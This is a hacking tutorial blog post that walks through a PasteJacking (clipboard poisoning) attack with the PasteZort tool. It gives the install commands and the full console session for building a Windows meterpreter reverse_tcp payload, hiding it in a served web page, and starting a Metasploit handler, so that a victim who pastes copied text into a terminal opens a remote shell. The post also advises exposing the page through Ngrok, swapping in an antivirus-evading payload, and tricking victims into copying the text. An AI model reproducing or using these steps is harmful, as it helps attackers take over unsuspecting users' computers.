Auto-Download & Auto-Execute Payload on Windows/Linux PC

Auto-Download & Auto-Execute Payload on Windows/Linux PC

Creating a meterpreter payload is easy and it is in your control but executing it on the target system is not in your hand.

You have to wait until the victim downloads clicks on the payload to open a meterpreter session.

But this problem will be completely solved after knowing about the PasteJacking method. Using this method malicious codes or commands, payloads can be downloaded and run automatically.

What is PasteJacking?

PasteJacking is a popular method where one can inject malicious hidden code into a webpage. When a user copies any text from the webpage pastes on a Terminal the malicious code is executed silently in the background without notifying the user. It is also known as a clipboard poisoning attack.

How PasteJacking is done?

Here we are going to use a very powerful tool called PasteZort. Download it from here. After downloading install and configure it. To do that simply follow these commands.

cd PasteZort
chmod +x *
sudo python PasteZ0rt.py
  • The last command should launch the tool.
_________________________________________________________________
| --------------------------------------------------------------- |
||            ____           _       _____          _            ||
||           |  _ \ __ _ ___| |_ ___|__  /___  _ __| |_          ||
||           | |_) / _` / __| __/ _ \ / // _ \| '__| __|         ||
||           |  __/ (_| \__ \ ||  __// /| (_) | |  | |_          ||
||           |_|   \__,_|___/\__\___/____\___/|_|   \__|         ||
||                           -----------                         ||
||                           |v| |0|.|1|                         ||
||                           -----------                         ||
||           ______    _   _        _    _            _          ||
||          |___  /   | | | |      | |  | |          | |         ||
||             / / ___| |_| |_ __ _| |__| | __ _  ___| | __      ||
||            / / / _ \ __| __/ _` |  __  |/ _` |/ __| |/ /      ||
||           / /_|  __/ |_| || (_| | |  | | (_| | (__|   <       ||
||          /_____\___|\__|\__\__,_|_|  |_|\__,_|\___|_|\_\      ||
||                                                               ||
| --------------------------------------------------------------- |
|_________________________________________________________________|

-------------------------------------------------------------------
 -> Iniciando servidor Apache:
-------------------------------------------------------------------

 -> ¡Apache Listo!
-------------------------------------------------------------------
                                                                                                     
   Sistema operativo objetivo:

   [1] Windows
   [2] Linux
   [3] Mac OSX

   Objetivo: 1

-------------------------------------------------------------------                                  
 -> Configuracion de Payload:                                                                        
-------------------------------------------------------------------                                  
                                                                                                     
   Seleccione Payload:

   [1] windows/meterpreter/reverse_tcp
   [2] windows/meterpreter/reverse_http
   [3] windows/meterpreter/reverse_https
   [4] windows/shell/reverse_tcp

   Payload: 1
  • After selecting the payload what you need to do is hit Enter and set the LHOST and the LPORT.
   LHOST= 192.168.113.128
   LPORT= 4444

-------------------------------------------------------------------                                  
 -> Generando payload...                                                                             
-------------------------------------------------------------------                                  
                                                                                                     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 296 bytes


-------------------------------------------------------------------                                  
 -> ¡Payload Generado!                                                                               
-------------------------------------------------------------------    
  • This will generate a payload for Windows. In the next step set the text you want to show in the webpage to copy.
  Mensaje 1: copy ----
   Mensaje 2: the code

-------------------------------------------------------------------                                  
 -> Payload, mensajes y comandos injectados en index.html                                            
-------------------------------------------------------------------                                  
 -> Archivo index.html copiado en servidor local  
 -> URL maliciosa: http://192.168.113.128/   
  • Now it will ask you if you want to start listener. Just say ‘y’ for yes.
                                                                                                     
   ¿Desea iniciar el handler? (y/n): y

-------------------------------------------------------------------                                  
 -> Iniciando handler Metasploit...   
  • When the target visits the served webpage(in our case it is HTTP://192.168.113.128) and copies the “copy —- the code” and paste it on the CMD, the hidden command will be executed and a meterpreter session will be opened.
  • Session 1 has been opened. To interact with the session, type ‘session 1’ in the terminal. Now you have complete access to the machine.
PasteJacking using PasteZort

Things you can change

  • If have a good knowledge of HTML then you can modify and add more design to the malicious webpage. The tool automatically transfers the generated webpage to the var/www/html directory. There you will find the ‘index.html‘ file.
  • If you want to share the webpage outside the network, you can use the Ngrok port forwarding service, which is free.
  • By default, the tool generates a meterpreter payload, which is detectable by any antivirus. You can replace the payload with an undetectable virus. It is up to you.

Conclusion

PasteJacking is a very effective method if you properly implement it. It needs your creativity. Nobody is goning to copy something that looks malicious and useless.

You have to be tricky. We always say “tools are just to make your work easier, not to do your work“. It’s you who have to make the work done.

What’s your opinion about PasteJacking? did you find it useful?